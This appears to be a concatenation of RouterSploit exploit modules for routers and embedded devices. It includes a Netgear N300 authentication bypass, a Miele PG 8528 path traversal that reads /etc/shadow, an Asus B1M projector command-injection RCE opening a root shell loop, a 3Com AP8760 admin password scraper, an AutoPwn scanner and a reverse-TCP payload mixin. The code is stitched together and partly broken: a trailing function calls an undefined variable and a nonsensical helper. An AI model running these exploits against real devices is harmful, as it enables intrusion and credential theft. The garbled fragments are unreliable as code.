response = exploit.check()
if response is True:
print_success("{} is vulnerable".format(exploit))
self.vulnerabilities.append(exploit)
elif response is False:
print_error("{} is not vulnerable".format(exploit))
else:
print_status("{} could not be verified".format(exploit))
class Exploit(exploits.Exploit):
"""
Exploit implementation for Netgear N300 Authentication Bypass vulnerability.
If the target is vulnerable link to bypass authentication will be provided"
"""
__info__ = {
'name':
'Netgear N300 Auth Bypass',
'description':
'Module exploits authentication bypass vulnerability in Netgear N300 devices. It is possible to access administration panel without providing password.',
'authors': [
'Daniel Haake <daniel.haake[at]csnc.de>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://www.compass-security.com/fileadmin/Datein/Research/Advisories/CSNC-2015-007_Netgear_WNR1000v4_AuthBypass.txt'
],
'targets': [
'Netgear N300',
]
}
target = exploits.Option(
'', 'Target address e.g. http://192.168.1.1') # target address
port = exploits.Option(80, 'Target port') # default port
def run(self):
if self.check():
print_success("Target is vulnerable")
url = sanitize_url("{}:{}".format(self.target, self.port))
print "Visit {}/BRS_netgear_success.html\n".format(url)
else:
print_error("Target seems to be not vulnerable")
@mute
def check(self):
url = sanitize_url("{}:{}/".format(self.target, self.port))
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
# unauthorized
if response.status_code == 401:
url = sanitize_url("{}:{}/BRS_netgear_success.html".format(
self.target, self.port))
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
# authorized
if response.status_code == 200:
return True # target is vulnerable
return False # target not vulnerable
class Exploit(exploits.Exploit):
"""
Exploit implementation for Miele Professional PG 8528 Path Traversal vulnerability.
If the target is vulnerable, content of the specified file is returned.
"""
__info__ = {
'name':
'Miele Professional PG 8528 Path Traversal',
'description':
'Module exploits Miele Professional PG 8528 Path Traversal vulnerability which allows '
'to read any file on the system.',
'authors': [
'Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7240',
'https://www.exploit-db.com/exploits/41718/',
],
'devices': ['Miele Professional PG 8528 PST10'],
}
target = exploits.Option('',
'Target address e.g. http://192.168.1.1',
validators=validators.url)
port = exploits.Option(80, 'Target Port')
filename = exploits.Option('/etc/shadow', 'File to read')
def run(self):
if self.check():
url = "{}:{}/../../../../../../../../../../../..{}".format(
self.target, self.port, self.filename)
response = http_request(method="GET", url=url)
if response is None:
return
if response.status_code == 200 and response.text:
print_success("Success! File: %s" % self.filename)
print_info(response.text)
else:
print_error("Exploit failed")
else:
print_error("Device seems to be not vulnerable")
@mute
def check(self):
url = "{}:{}/../../../../../../../../../../../../etc/shadow".format(
self.target, self.port)
response = http_request(method="GET", url=url)
if response is not None and "root:" in response.text:
return True # target vulnerable
return False # target is not vulnerable
class Exploit(exploits.Exploit):
"""
Exploit implementation for Asus B1M Projector Remote Code Execution vulnerability.
If the target is vulnerable, command loop is invoked that allows executing commands with root privileges.
"""
__info__ = {
'name':
'Asus B1M Projector RCE',
'description':
'Module exploits Asus B1M Projector Remote Code Execution vulnerability which '
'allows executing command on operating system level with root privileges.',
'authors': [
'Hacker House <www.myhackerhouse.com>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://www.myhackerhouse.com/asus-b1m-projector-remote-root-0day/',
],
'devices': [
'Asus B1M Projector',
],
}
target = exploits.Option('',
'Target address e.g. http://192.168.1.1',
validators=validators.url)
port = exploits.Option(80, 'Target Port', validators=validators.integer)
def run(self):
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
shell(self, architecture="mips")
else:
print_error("Target is not vulnerable")
def execute(self, cmd):
""" callback used by shell functionality """
url = "{}:{}/cgi-bin/apply.cgi?ssid=\"%20\"`{}`".format(
self.target, self.port, cmd)
response = http_request(method="GET", url=url)
if response is None:
return ""
return response.text
@mute
def check(self):
cmd = "cat /etc/shadow"
response_text = self.execute(cmd)
if "root:" in response_text:
return True # target is vulnerable
return False # target is not vulnerable
class Exploit(exploits.Exploit):
"""
Scanner implementation for all vulnerabilities.
"""
__info__ = {
'name': 'AutoPwn',
'description': 'Scanner module for all vulnerabilities.',
'author': [
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
}
target = exploits.Option('', 'Target IP address e.g. 192.168.1.1') # target address
port = exploits.Option(80, 'Target port') # default port
def run(self):
rootpath = 'routersploit/modules/'
path = 'exploits'
modules = []
for device in listdir(rootpath+path): # TODO refactor this, using load_modules() from core
if not device.endswith(".py") and not device.endswith(".pyc"):
for f in listdir(rootpath+path + "/" + device):
if f.endswith(".py") and f != "__init__.py":
modules.append(device + "/" + f[:-3])
vulnerabilities = []
for module_name in modules:
f = "".join((path, "/", module_name))
module = imp.load_source('module', rootpath + f + '.py')
exploit = module.Exploit()
exploit.target = self.target
exploit.port = self.port
response = exploit.check()
if response is True:
print_success("{} is vulnerable".format(f))
vulnerabilities.append(f)
elif response is False:
print_error("{} is not vulnerable".format(f))
else:
print_status("{} could not be verified".format(f))
if vulnerabilities:
print
print_success("Device is vulnerable!")
for v in vulnerabilities:
print_info(" - {}".format(v))
else:
print_error("Device is not vulnerable to any exploits!\n")
def check(self):
print_error("Check method is not available")
class Exploit(exploits.Exploit):
"""
Exploit implementation for 3Com AP8760 Password Disclosure vulnerability.
If the target is vulnerable it is possible to fetch credentials for administration user.
"""
__info__ = {
'name': '3Com AP8760 Password Disclosure',
'description': 'Exploits 3Com AP8760 password disclosure vulnerability.'
'If the target is vulnerable it is possible to fetch credentials for administration user.',
'authors': [
'Richard Brain', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'http://www.procheckup.com/procheckup-labs/pr07-40/',
],
'devices': [
'3Com AP8760',
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(80, 'Target port') # default port
def run(self):
creds = []
url = "{}:{}/s_brief.htm".format(self.target, self.port)
print_status("Sending payload request")
response = http_request(method="GET", url=url)
if response is None:
return
print_status("Extracting credentials")
username = re.findall('<input type="text" name="szUsername" size=16 value="(.+?)">', response.text)
password = re.findall('<input type="password" name="szPassword" size=16 maxlength="16" value="(.+?)">', response.text)
if len(username) and len(password):
print_success("Exploit success")
creds.append((username[0], password[0]))
print_table(("Login", "Password"), *creds)
else:
print_error("Exploit failed - could not extract credentials")
@mute
def check(self):
url = "{}:{}/s_brief.htm".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
if "szUsername" in response.text and "szPassword" in response.text:
return True # target is vulnerable
return False # target not vulnerable
def line_feed_queue(results):
port_list = [80, 443, 8080, 81, 4567, 9999, 22, 23, 25, 53]
for ip in results:
target = exploits.Option(str(ip))
for port in list_of_ports:
port = exploits.Option(str(port))
threads = exploits.Option(int(8))
# open_display_thread()
operate_wait_and_hold_generate_py_script(target, port, threads)
return
class ReverseTCPPayloadMixin(object):
__metaclass__ = exploits.ExploitOptionsAggregator
handler = PayloadHandlers.REVERSE_TCP
lhost = exploits.Option('',
'Connect-back IP address',
validators=validators.ipv4)
lport = exploits.Option(5555,
'Connect-back TCP Port',
validators=validators.integer)
